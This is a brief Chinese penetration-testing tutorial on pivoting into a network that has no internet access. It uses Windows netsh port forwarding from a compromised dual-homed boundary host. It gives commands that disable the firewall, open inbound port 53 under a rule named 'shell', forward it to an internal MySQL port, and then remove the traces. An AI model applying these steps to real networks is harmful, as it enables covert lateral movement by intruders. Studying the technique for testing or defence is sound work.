内网端口转发[netsh]
一.利用场景
当前获取目标内网边界区域一台机器,可以通外网和内网也就是存在两块网卡,又通过其他手段获取到内网另外一台机器,但是这台机器不能出外网,所以我们可以使用windows自带netsh命令通过边界机器来连接内网不出网的机器。
二.利用手法
netsh firewall show config 查看防火墙配置
netsh firewall show state 查看当前系统防火墙状态
netsh interface portproxy show all 查看端口转发规则
如防火墙开启则需关闭防火墙: netsh advfirewall set allprofiles state off
add 为增加规则,
delete 为删除规则
allow 为允许连接,
block 为阻断连接
in 为入站,
out 为出站
name 为要显示的规则名称
在边界机上执行,把外部的某个端口的流量转发到内网指定机器的端口上这里选择内网机器的3306端口。
netsh advfirewall firewall add rule name=”shell” dir=in action=allow protocol=TCP localport=53 允许本地连接53端口[入站允许]
netsh interface portproxy add v4tov4 listenport=53 connectaddress=内网机器IP connectport=3306
netstat -ano | findstr “:53” 查看53端口是否开放成功
netsh advfirewall firewall delete rule name=”shell” dir=in protocol=TCP localport=53 删除入站允许
netsh interface portproxy delete v4tov4 listenport=53 删除规则
三.注意事项win2003操作命令不同
netsh interface ipv6 install windows2003使用 netsh,需要先安装好 ipv6 支持,由于 netsh 同时支持 ipv4 和 ipv6 端口转发,如果不 装,netsh 工作可能会有些问题
netsh firewall show state 查看当前系统防火墙状态
netsh firewall set opmode disable 关闭当前系统防火墙
netsh firewall set opmode enable 启用当前系统防火墙